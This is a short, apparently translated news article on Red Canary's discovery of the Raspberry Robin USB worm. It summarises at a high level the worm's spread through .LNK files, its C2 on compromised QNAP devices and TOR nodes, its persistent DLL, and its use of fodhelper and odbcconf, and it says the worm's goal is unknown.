Malware is malicious software capable of giving us a hard time if we don’t have our computers sufficiently protected from them. Not all malware is the same, nor does it attack in the same way, and, of course, not all malware has the same goal. This is precisely the concern generated after the discovery of this new malware (as yet without a name), since up to now it has not been possible to identify what it was designed for.
A malware created by Raspberry Robin
The researchers of the prestigious firm Red Canary have been the ones who have been able to discover its existence. This one, which currently has no associated name, has been linked to a group calling itself “Raspberry Robin”. This, instead of directly affecting Windows, uses external USB drives to spread like a worm, the name given to computer viruses that make multiple copies of themselves.
Through a malicious .LNK file, the worm is activated by connecting the USB drive to the computer with a cmd.exe process, executing the file. To reach the C2 servers, which are precisely in charge of dealing with malware, this worm would use Microsoft Standard Installer. As Red Canary points out in its report, the server would be hosted on a compromised QNAP device (one or more hard drives always connected to the network), and would have TOR exit nodes that would be used as additional C2 infrastructure.
With all this process, what the malware is looking for is to take advantage of a normal packet delivery process to “deliver” malware at once, and by doing this has already been detected on several business networks.
His goal is still a mystery
As we said right at the beginning, what most bothers the researchers who discovered this malicious software is that they have not yet been able to identify what it was designed for. According to the firm itself:
In the absence of additional information on subsequent activity and final stages, it is difficult to draw any conclusions about the goal(s) of these types of campaigns.
It should also be noted that this software leaves behind a malicious DLL installed. These types of files are quite useful, but they are nothing more than pieces of a program capable of performing various functions and that are located in a system directory. Red Canary also does not know why this file is installed, although everything indicates that it could be to generate some “resistance” on the infected computer, and not be eliminated through restarts.
For this DLL, this Raspberry Robin malware uses two utilities that Windows itself has: fodhelper (which helps manage features in Windows setup) and odbcconf (a command-line tool that allows you to configure ODBC drivers). The former is intended to bypass User Account Control, while the latter will help run and configure the DLL itself.